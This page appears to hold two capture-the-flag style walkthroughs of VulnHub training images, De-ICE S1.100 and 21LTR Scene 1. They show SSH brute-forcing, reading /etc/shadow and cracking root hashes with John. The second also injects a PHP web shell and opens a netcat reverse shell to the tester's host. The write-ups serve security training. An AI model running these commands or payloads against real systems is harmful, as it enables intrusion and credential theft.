WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
01-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave) 
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr. System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few information:

  • Names of people that is working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
02-nmap
Figure 2. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22 SSH service
  • 25 SMTP service
  • 80 HTTP service
  • 110 POP3 service
  • 143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
03-medusa
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
04-ssh
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
05-sudo
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

06-cat_shadow
Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt

 

07-unshadow
Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
08-john
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
09-no_root_ssh
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

10-aadams_root
Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

11-found_file
Figure 11. Curious file
12-encripted_file
Figure 12. encripted file, maybe
bin walk salary_dec2003.csv.enc
15-binwalk
Figure 13. confirming is an excerpted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
18-ciphers
Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
16-decripting_file
Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

17-files_content
Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.

 

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WALKTHROUGH: De-ICE: S1.100

Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
001-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

login_pass_in_source_code
Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

dirb http://192.168.2.120
005-dirb.png
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
002-nmap.png
Figure 4. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

003-ftp_connection.png
Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php

004-browser
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

 

At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “192.168.2.240”.

006-wireshark
Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “192.168.2.240” (my machine now) with the port 10000.

007-wireshark2
Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

008-wireshark3
Figure 9. Wireshark result
exiftool --list output
exif
Figure 10. exiftool result
014-downloaded file
Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

009-wireshark4
Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

010-browser
Figure 13. Messages typed

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
011-curl to cmd.png
Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh #

And, success, we have our shell.

012-remote conexion
Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
  • id_rsa: The private key to connect to SSH
015-user_for_ssh
Figure 16. User with SSH access
016-private_key
Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@192.168.2.120
017-ssh_to_remote
Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l
018-available_no_pass
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

019-etc_shadow
Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password
020-john_root
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

021-root
Figure 22. We are root!

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Walkthrough: 21LTR: Scene 1